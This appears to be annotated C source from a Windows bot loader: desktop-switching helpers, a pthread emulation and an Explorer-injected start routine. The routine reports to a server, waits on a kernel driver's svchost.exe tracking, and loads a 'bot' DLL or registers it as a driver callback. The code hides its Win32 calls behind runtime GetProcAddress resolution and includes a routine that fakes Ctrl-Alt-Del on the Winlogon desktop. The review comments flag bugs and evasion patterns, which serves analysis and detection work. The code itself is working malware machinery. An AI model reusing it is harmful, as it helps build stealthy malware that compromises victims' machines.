/*
 * Make new_desktop the calling thread's desktop and close the desktop the
 * thread was on before.
 *
 * Every Win32 entry point is resolved at run time through
 * GetProcAddress(LoadLibrary(...)) instead of the import table. For a
 * reviewer this matters twice: the calls never appear in the static import
 * list (a string-based API resolution pattern worth having detection for),
 * and none of the returned pointers is checked for NULL before use, while
 * each LoadLibrary call raises the module refcount with no FreeLibrary.
 *
 * new_desktop: handle of the desktop to switch to.
 * Returns TRUE on success; FALSE if the desktop name cannot be queried or
 * SetThreadDesktop fails (in both cases the thread stays on its previous
 * desktop and old_desktop is left open).
 */
BOOL SelectHDESK(HDESK new_desktop)
{
    typedef DWORD (WINAPI *GetCurrentThreadIdT)( VOID );
    GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId");
    typedef HDESK (WINAPI *GetThreadDesktopT)( __in DWORD dwThreadId);
    GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop");
    typedef BOOL (WINAPI *GetUserObjectInformationAT)( __in HANDLE hObj, __in int nIndex, __out_bcount_opt(nLength) PVOID pvInfo, __in DWORD nLength, __out_opt LPDWORD lpnLengthNeeded);
    GetUserObjectInformationAT pGetUserObjectInformationA=(GetUserObjectInformationAT)GetProcAddress(LoadLibrary("USER32.dll"),"GetUserObjectInformationA");
    typedef BOOL (WINAPI *SetThreadDesktopT)( __in HDESK hDesktop);
    SetThreadDesktopT pSetThreadDesktop=(SetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"SetThreadDesktop");
    typedef BOOL (WINAPI *CloseDesktopT)( __in HDESK hDesktop);
    CloseDesktopT pCloseDesktop=(CloseDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"CloseDesktop");

    HDESK old_desktop = pGetThreadDesktop(pGetCurrentThreadId());

    /* The name itself is never used afterwards; the query only serves as a
     * check that new_desktop is a usable desktop handle before switching. */
    DWORD dummy;
    char new_name[256];
    if (!pGetUserObjectInformationA(new_desktop, UOI_NAME, &new_name, 256, &dummy)) {
        return FALSE;
    }

    // Switch the desktop
    if(!pSetThreadDesktop(new_desktop)) {
        return FALSE;
    }

    // Switched successfully - destroy the old desktop (return value unchecked)
    pCloseDesktop(old_desktop);
    return TRUE;
}
/*
 * Wait until `thread` is no longer on the thread list (pthread_join
 * emulation on top of SysSuspendThread/SysResumeThread).
 *
 * The caller appends a stack-allocated entry to the global joinList and
 * suspends itself; a thread that exits (see pthread_start) detaches
 * joinList and resumes every queued waiter, which then re-checks whether
 * `thread` is still alive and, if so, queues itself again.
 *
 * valuePtr: the joined thread's return value is never stored; a non-NULL
 *   pointer only produces a debug print, so callers must not read *valuePtr.
 * Returns 0 in all cases. A thread that is not on the thread list is
 *   treated as already finished.
 *
 * NOTE(review): between pthread_mutex_unlock(&joinMutex) and
 * SysSuspendThread() the target thread can exit and call SysResumeThread
 * on a thread that is not suspended yet. Whether that wake-up is lost
 * depends on SysResumeThread's semantics, which are not visible here --
 * confirm against its implementation.
 */
int pthread_join(pthread_t thread, void** valuePtr)
{
    if (valuePtr)
        printf("valuePtr != NULL\n");   /* debug leftover; valuePtr is otherwise ignored */

    struct pthread_queue entry;
    struct pthread_queue* head;

    /* Check if it is already on the thread list. */
    if (!pCheckThreadList(thread))
        return 0;

    while (1) {
        /* Add to the join list. */
        pthread_mutex_lock(&joinMutex);
        head = joinList;
        entry.threadId = pGetCurrentThreadId();
        entry.next = NULL;
        /* %d assumes pthread_t is an int-sized integer (pthread_self returns
         * pGetCurrentThreadId()) -- confirm against the typedef. */
        printf("waiting for %d\n", thread);
        if (!head) {
            joinList = &entry;
        }else{
            while (head->next)
                head = head->next;
            head->next = &entry;
        }
        pthread_mutex_unlock(&joinMutex);

        SysSuspendThread(pGetCurrentThreadId());
        if (!pCheckThreadList(thread))
            break;
    }

    /* `entry` lives on this stack frame and is still reachable by the
     * exiting thread while it walks the detached join list under joinMutex;
     * taking and releasing the mutex here ensures that walk has finished
     * before this frame is torn down. */
    pthread_mutex_lock(&joinMutex);
    pthread_mutex_unlock(&joinMutex);
    return 0;
}
// Lazily create the global list of send-data handlers.
//
// The list is (re)created when it does not exist yet, or when it was set up
// under a different thread id than the current one. The original comment
// explains the second case as "created in another process", i.e. the
// globals survived into a new process where the stored pointer is no longer
// valid and must not be released.
//
// NOTE(review): the check compares thread ids, not process ids, so a second
// thread in the same process also recreates the list and the previous one is
// simply dropped. TID holds the raw thread id cast to HANDLE; it is not a
// real handle and must not be closed.
void InitializeHandlersList()
{
    HANDLE TID = (HANDLE)pGetCurrentThreadId();
    if (SendDataHandlers == NULL || SendHandlersTID != TID) {
        SendDataHandlers = List::Create();
        // presumably DestroyDataHandler is invoked per item when the list
        // releases it -- the List API is not visible here
        List::SetFreeItemMehod(SendDataHandlers, DestroyDataHandler);
        SendHandlersTID = TID;
    }
}
/*
 * Thread procedure executed inside the Explorer process (loader step
 * "302_ld"). Data is expected to be a PUSER_INIT_NOTIFY (presumably handed
 * over by whatever started this thread -- not visible here).
 *
 * Observable sequence: report the step, start the DbgRptExplorerThread
 * reporting thread, spin until CheckIsInjectToProcess() no longer reports
 * svchost.exe, try DoStartBotDll() and, if that fails, register StartBotDll
 * as a driver callback keyed on this thread id, then park in an alertable
 * SleepEx loop. Returns 0 on every exit path; the final `return 0` after
 * the endless loop is unreachable.
 *
 * The LDRDBG strings are Russian log messages; they are runtime data and
 * left untouched, with their meaning noted beside each call so the log
 * output can be matched against this code when the stage is observed.
 */
DWORD WINAPI ExplorerStartProc(LPVOID Data)
{
    LDRDBG("BRDS", "Зупущена функция Эксплорера ");   /* log: "Explorer function started" */

    if (Data == NULL) {
        LDRDBG("BRDS Explorer", "Ошибочные данные для работы в эксплорере ");   /* log: "bad data for running in Explorer" */
        return 0;
    }

    // 302_ld: started inside Explorer (there may be no network at this point)
    DebugReportStepByName("302_ld");

    // Start the call-home thread to the test server
    // (original comment says "in svchost"; this runs in Explorer)
    StartThread(DbgRptExplorerThread, NULL);

    PUSER_INIT_NOTIFY InitData = (PUSER_INIT_NOTIFY)Data;

    LDRDBG("BRDS Explorer", "Ожидаем пока драйвер отключит слежение за процессоь svchost.exe ");   /* log: "waiting until the driver stops tracking svchost.exe" */
    /* Busy-wait with a 300 ms sleep; there is no timeout on this loop. */
    while (CheckIsInjectToProcess(InitData, SVChostName))
        pSleep(300);

    LDRDBG("BRDS Explorer", "Запуск потока Эксплорера ");   /* log: "starting Explorer thread" */

    // First try to start the DLL from the file
    if (DoStartBotDll(InitData, 5000)) {
        LDRDBG("BRDS Explorer", "Бот успешно загружен из кэша ");   /* log: "bot loaded from cache" */
        return 0;
    }

    // Register the callback event
    LDRDBG("BRDS Explorer", "Регистрируем метод обратной связи в процессе Explorer ");   /* log: "registering callback method in Explorer" */
    if (!DriverRegisterGlobalCallback(InitData, (DWORD)pGetCurrentThreadId(), StartBotDll, NULL)) {
        LDRDBG("BRDS Explorer", "Ошибка регистрации метода обратной свзи експлорера ");   /* log: "error registering Explorer callback method" */
        return 0;
    }

    // Endless wait loop; the alertable SleepEx lets queued APCs run on this thread
    do {
        pSleepEx(10000, TRUE);
    }while(1);

    return 0;   /* unreachable */
}
/*
 * Condition-variable wait emulated on SysSuspendThread.
 *
 * Requires `mutex` to be held by the caller (mutex->owner == current thread
 * id), otherwise EINVAL. If a signal is already pending (cond->signal ==
 * PTHREAD_COND_SIGNAL) it is consumed and 0 is returned without ever
 * releasing `mutex` -- signals are "sticky" here, unlike POSIX. Otherwise
 * the caller links a stack entry into cond->list, releases `mutex`,
 * suspends until the signal flag is set, re-acquires `mutex`, clears the
 * flag and returns 0.
 *
 * Returns 0, EINVAL, or -1 when SysSuspendThread fails.
 *
 * NOTE(review): on the -1 path `mutex` is not re-acquired and `entry` (a
 * stack object) stays linked in cond->list. The entry is not unlinked on
 * the success path either, so whoever drains cond->list (presumably
 * pthread_cond_signal, not visible here) must do so before this frame
 * returns -- confirm.
 */
int pthread_cond_wait(pthread_cond_t* cond, pthread_mutex_t* mutex)
{
    struct pthread_queue entry;
    /* cond->list is read before cond->mutex is taken and that stale value
     * is walked under the lock below; if the list became non-empty in
     * between, `cond->list=&entry` overwrites the other waiter. */
    struct pthread_queue* last=cond->list;
    int threadId;

    threadId = pGetCurrentThreadId();
    if (mutex->owner != threadId)
        return EINVAL;

    /* Fast path: a signal arrived before this thread started waiting. */
    if (cond->signal == PTHREAD_COND_SIGNAL) {
        cond->signal = PTHREAD_COND_INITIAL;
        return 0;
    }

    entry.threadId=threadId;
    entry.next=NULL;
    pthread_mutex_lock(&cond->mutex);
    if (!last) {
        cond->list=&entry;
    }else{
        while (last->next)
            last=last->next;
        last->next=&entry;
    }
    pthread_mutex_unlock(&cond->mutex);

    /* Release the user mutex only after the entry is queued. */
    pthread_mutex_unlock(mutex);
    while (cond->signal != PTHREAD_COND_SIGNAL)
        if (SysSuspendThread(threadId))
            return -1;   /* mutex is NOT re-acquired on this path */
    pthread_mutex_lock(mutex);
    cond->signal = PTHREAD_COND_INITIAL;
    return 0;
}
/*
 * Post a Ctrl-Alt-Del hotkey message on the Winlogon desktop, then return
 * the thread to the desktop it came from.
 *
 * Returns FALSE only when SelectDesktop("Winlogon") fails; the result of
 * PostMessageA is not checked, so TRUE does not mean the message was
 * delivered. Win32 APIs are resolved through GetProcAddress(LoadLibrary())
 * without NULL checks and without FreeLibrary (see SelectHDESK).
 *
 * NOTE(review): old_desktop comes from GetThreadDesktop. SelectHDESK closes
 * whatever desktop the thread is on at the time it is called (here the
 * Winlogon one opened by SelectDesktop); confirm that SelectDesktop and
 * SelectHDESK agree on handle ownership, since neither side checks the
 * CloseDesktop result.
 */
BOOL SimulateCtrlAltDel()
{
    typedef DWORD (WINAPI *GetCurrentThreadIdT)( VOID );
    GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId");
    typedef HDESK (WINAPI *GetThreadDesktopT)( __in DWORD dwThreadId);
    GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop");
    typedef BOOL (WINAPI *PostMessageAT)( __in_opt HWND hWnd, __in UINT Msg, __in WPARAM wParam, __in LPARAM lParam);
    PostMessageAT pPostMessageA=(PostMessageAT)GetProcAddress(LoadLibrary("USER32.dll"),"PostMessageA");

    HDESK old_desktop = pGetThreadDesktop(pGetCurrentThreadId());

    // Switch into the Winlogon desktop
    if (!SelectDesktop("Winlogon")) {
        return FALSE;
    }

    // Fake a hotkey event to any windows we find there.... :(
    // Winlogon uses hotkeys to trap Ctrl-Alt-Del...
    pPostMessageA(HWND_BROADCAST, WM_HOTKEY, 0, MAKELONG(MOD_ALT | MOD_CONTROL, VK_DELETE));

    // Switch back to our original desktop (result of SelectHDESK unchecked)
    if (old_desktop != NULL)
        SelectHDESK(old_desktop);

    return TRUE;
}
/*
 * If the desktop that currently receives user input differs (by name) from
 * the one this thread is on, move the thread onto the input desktop.
 *
 * Returns true when the names differed and a switch was attempted, false
 * when the thread is already on the input desktop.
 *
 * NOTE(review): none of the Win32 results is checked. If OpenInputDesktop
 * returns NULL the name query fails too, strInputDesktop stays empty, the
 * names differ, SetThreadDesktop(NULL) fails silently and true is still
 * returned. A failed SetThreadDesktop on a valid handle is likewise
 * reported as success. Both handles are closed before returning; closing
 * hNewDesktop right after the thread switched onto it is documented to
 * fail while a thread of the process uses it, and that failure is not
 * checked -- confirm whether the handle is meant to leak. As elsewhere in
 * this file the APIs are resolved at run time via
 * GetProcAddress(LoadLibrary()) without NULL checks or FreeLibrary.
 */
bool SwitchInputDesktop()
{
    typedef DWORD (WINAPI *GetCurrentThreadIdT)( VOID );
    GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId");
    typedef HDESK (WINAPI *GetThreadDesktopT)( __in DWORD dwThreadId);
    GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop");
    typedef BOOL (WINAPI *GetUserObjectInformationAT)( __in HANDLE hObj, __in int nIndex, __out_bcount_opt(nLength) PVOID pvInfo, __in DWORD nLength, __out_opt LPDWORD lpnLengthNeeded);
    GetUserObjectInformationAT pGetUserObjectInformationA=(GetUserObjectInformationAT)GetProcAddress(LoadLibrary("USER32.dll"),"GetUserObjectInformationA");
    typedef BOOL (WINAPI *SetThreadDesktopT)( __in HDESK hDesktop);
    SetThreadDesktopT pSetThreadDesktop=(SetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"SetThreadDesktop");
    typedef HDESK (WINAPI *OpenInputDesktopT)( __in DWORD dwFlags, __in BOOL fInherit, __in ACCESS_MASK dwDesiredAccess);
    OpenInputDesktopT pOpenInputDesktop=(OpenInputDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"OpenInputDesktop");
    typedef BOOL (WINAPI *CloseDesktopT)( __in HDESK hDesktop);
    CloseDesktopT pCloseDesktop=(CloseDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"CloseDesktop");
    typedef int (WINAPI *lstrcmpAT)( __in LPCSTR lpString1, __in LPCSTR lpString2 );
    lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrcmpA");

    BOOL bRet = false;   /* BOOL holding a bool; converted back to bool on return */
    DWORD dwLengthNeeded;
    HDESK hOldDesktop, hNewDesktop;
    char strCurrentDesktop[256], strInputDesktop[256];

    /* Name of the desktop this thread is on now. */
    hOldDesktop = pGetThreadDesktop(pGetCurrentThreadId());
    memset(strCurrentDesktop, 0, sizeof(strCurrentDesktop));
    pGetUserObjectInformationA(hOldDesktop, UOI_NAME, &strCurrentDesktop, sizeof(strCurrentDesktop), &dwLengthNeeded);

    /* Name of the desktop currently receiving input (buffer pre-zeroed so a
     * failed query yields an empty string rather than garbage). */
    hNewDesktop = pOpenInputDesktop(0, FALSE, MAXIMUM_ALLOWED);
    memset(strInputDesktop, 0, sizeof(strInputDesktop));
    pGetUserObjectInformationA(hNewDesktop, UOI_NAME, &strInputDesktop, sizeof(strInputDesktop), &dwLengthNeeded);

    if (plstrcmpA(strInputDesktop, strCurrentDesktop) != 0) {
        pSetThreadDesktop(hNewDesktop);   /* result unchecked */
        bRet = true;
    }

    pCloseDesktop(hOldDesktop);
    pCloseDesktop(hNewDesktop);
    return bRet;
}
/*
 * Trampoline every emulated pthread starts in. `arg` is a struct
 * pthreadArgs* carrying the user start routine, its argument and a
 * condition variable that the creating thread presumably waits on
 * (pthread_create is not visible here).
 *
 * Steps: set up thread-local storage, link a stack-allocated entry for this
 * thread onto the global threadList, signal the creator, run the user
 * routine, unlink the entry, wake every thread queued in joinList (see
 * pthread_join) and exit via SysExitThread. The user routine's return
 * value is discarded, which is why pthread_join cannot report it.
 *
 * NOTE(review): `head = threadList; while (head->next)` dereferences
 * threadList without a NULL check, so the list must already contain at
 * least one node (presumably the main thread) -- confirm at initialisation.
 */
static void pthread_start(void* arg)
{
    struct pthreadArgs* pArgs=(struct pthreadArgs*)arg;
    /* Copy what is needed out of pArgs before signalling the creator, in
     * case the creator releases pArgs once signalled (presumed). */
    void* (*start)(void*) = pArgs->startRoutine;
    void* args = pArgs->args;
    struct pthread_queue entry;
    struct pthread_queue* head;

    DlTlsCreateContext();

    /* Register this thread on the (non-empty) thread list. */
    entry.threadId = pGetCurrentThreadId();
    entry.next = NULL;
    pthread_mutex_lock(&listMutex);
    head = threadList;
    while (head->next)
        head = head->next;
    head->next = &entry;
    pthread_mutex_unlock(&listMutex);

    pthread_cond_signal(pArgs->signal);

    start(args);

    /* Remove ourselves from the thread list. */
    pthread_mutex_lock(&listMutex);
    head = threadList;
    while (head->next && head->next != &entry)
        head = head->next;
    if (head->next)
        head->next = head->next->next;
    pthread_mutex_unlock(&listMutex);

    /* Wake up and remove everything in the join list. The list is detached
     * (joinList = NULL) and walked while joinMutex is still held, so a
     * resumed joiner cannot tear down its stack entry before we are done
     * (pthread_join takes joinMutex once more before returning). Every
     * waiter is resumed, not just those joining this thread; they re-check
     * their target themselves. */
    pthread_mutex_lock(&joinMutex);
    head = joinList;
    joinList = NULL;
    while (head) {
        SysResumeThread(head->threadId);
        head = head->next;
    }
    pthread_mutex_unlock(&joinMutex);

    /* Actually exit the thread. We used to be able to return onto a frame
     * set up by the kernel, but that no longer happens. */
    SysExitThread(-1);
}
/* Identifier of the calling thread. In this emulation a pthread_t is simply
 * the value pGetCurrentThreadId() returns, so the two are interchangeable. */
pthread_t pthread_self(void)
{
    pthread_t self = pGetCurrentThreadId();
    return self;
}